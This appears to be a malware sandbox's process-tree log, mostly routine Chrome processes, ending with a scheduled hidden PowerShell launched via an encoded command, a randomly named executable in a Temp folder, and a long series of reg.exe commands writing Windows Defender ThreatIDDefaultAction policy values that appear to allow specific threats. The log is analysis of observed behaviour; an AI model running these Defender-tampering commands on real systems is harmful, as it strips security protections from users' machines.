C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:12⤵PID:204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:12⤵PID:188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:82⤵PID:4160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4324 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4708
-
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --force-configure-user-settings2⤵PID:4796
-
C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe"C:\Program Files\Google\Chrome\Application\86.0.4240.111\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff76acb7740,0x7ff76acb7750,0x7ff76acb77603⤵PID:4844
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4796 /prefetch:82⤵PID:4804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5060 /prefetch:82⤵PID:5108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5200 /prefetch:82⤵PID:4172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5336 /prefetch:82⤵PID:4344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5484 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5536 /prefetch:82⤵PID:4432
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:82⤵PID:4516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5336 /prefetch:82⤵PID:4632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5724 /prefetch:82⤵PID:4600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5308 /prefetch:82⤵PID:4560
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6520 /prefetch:82⤵PID:4160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6564 /prefetch:82⤵PID:4740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5928 /prefetch:82⤵PID:4708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5696 /prefetch:82⤵PID:4796
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6640 /prefetch:82⤵PID:4844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:82⤵PID:4964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6492 /prefetch:82⤵PID:5008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6476 /prefetch:82⤵PID:5044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6732 /prefetch:82⤵PID:5084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5688 /prefetch:82⤵PID:4368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6764 /prefetch:82⤵PID:3444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6644 /prefetch:82⤵PID:4476
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4220 /prefetch:12⤵PID:4520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4244 /prefetch:82⤵PID:4276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4184 /prefetch:82⤵PID:4428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7060 /prefetch:82⤵PID:4636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6708 /prefetch:82⤵PID:4384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5704 /prefetch:82⤵PID:4688
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4192 /prefetch:82⤵PID:4988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:12⤵PID:5096
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:82⤵PID:2592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4204 /prefetch:82⤵PID:4412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6604 /prefetch:82⤵PID:2488
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5856 /prefetch:82⤵PID:3480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:82⤵PID:4652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3692 /prefetch:82⤵PID:4580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6592 /prefetch:12⤵PID:4644
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3668 /prefetch:82⤵PID:4612
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6792 /prefetch:82⤵PID:4280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3676 /prefetch:82⤵PID:3632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5540 /prefetch:82⤵PID:4388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3892 /prefetch:12⤵PID:3272
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3964 /prefetch:82⤵PID:3652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3976 /prefetch:82⤵PID:4376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6608 /prefetch:82⤵PID:4356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6704 /prefetch:82⤵PID:4400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6772 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4600
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2192 /prefetch:82⤵PID:4516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4116 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7156 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6892 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1736 /prefetch:82⤵PID:2800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2332 /prefetch:82⤵PID:4048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1460,6364288434676269325,2174288270123522362,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3736 /prefetch:82⤵PID:3164
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1416
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1264
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1244
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1080
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in Windows directory
PID:620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:5452
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:5204
-
-
-
C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\BtMHRlU.exeC:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\BtMHRlU.exe 9n /site_id 754 /S2⤵PID:384
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"3⤵PID:9204
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:8836
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵PID:2960
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵PID:8760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵PID:8860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵PID:8788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵PID:4388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵PID:9200
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵PID:8980
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵PID:7672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵PID:1748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵PID:956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵PID:4436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵PID:5952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵PID:7788
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵PID:8820
-
-
